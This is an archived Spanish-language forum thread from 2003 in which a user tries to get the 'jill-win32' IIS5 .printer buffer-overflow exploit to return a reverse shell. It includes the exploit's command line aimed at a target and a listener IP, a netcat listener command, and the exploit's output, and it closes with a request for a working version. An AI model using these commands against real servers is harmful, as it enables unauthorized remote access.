PDA

Ver la versión completa : iis isapi .printer



skurn
04-12-2003, 18:24
Saludos a todos:

Pues nada, mi problema es que estoy intentando hacer funcionar correctamente el exploit jil-win32, y realmente realiza el desbordamiento de buffer, pero no consigo la shell. Me aparece lo siguiente

iis5 remote .printer overflow
dark spyrit

connected.
send...
you may need to send a carriage on your listener if the shell doesn't appear.

me he leido la muy buena explicación de cyruxnet.com.ar/isapi.html y he seguido lo que ahi se dice, pero con el netcat no me aparece nada.
Además, el server es vulnerable, ya que no tiene ningun service pack instalado. El mensaje tampoco es filtrado por ningun cortafuegos.

pues eso. Si alguien puede ayudarme, le doy las gracias por adelantado.:confused:

THE_CROW
04-12-2003, 22:14
"you may need to send a carriage on your listener if the shell doesn't appear. "

No se te habrá olvidado pulsar "Intro" en el netcat no? Teoricamente cuando le das cambia de linea aparaciendo la shell.

skurn
05-12-2003, 13:28
Ni dandole al intro ni sin darle. el tema esta en que se queda escuchando en el puerto que le he indicado, pero ya esta, no recibe nada se ve.
Sere mas explicito: abro dos ventanas de ms-dos. en una pongo

jill-win32 192.168.1.1 80 192.168.1.2 3333

y en la otra

nc -v -v -l -p 3333
listening on [any] 3333

Se me ocurre que el exploit no funcione bien, pero segun parece hay mas gente que lo ha probado y que le funciona bien.

skurn
05-12-2003, 14:02
Bueno, parece ser que el exploit no hace todo lo que se supone que tiene que hacer. Me he enchufado el sniffer para ver que es lo que circula por ahi, y resulta que no manda ningun paquete al puerto que le indico previamente, asi que ... me parece a mi que no funciona bien.

Si alguien cree que me equivo que me lo diga y si sabeis de ese exploit que funcione (para güindows), poned un link para que lo pueda probar.

gracias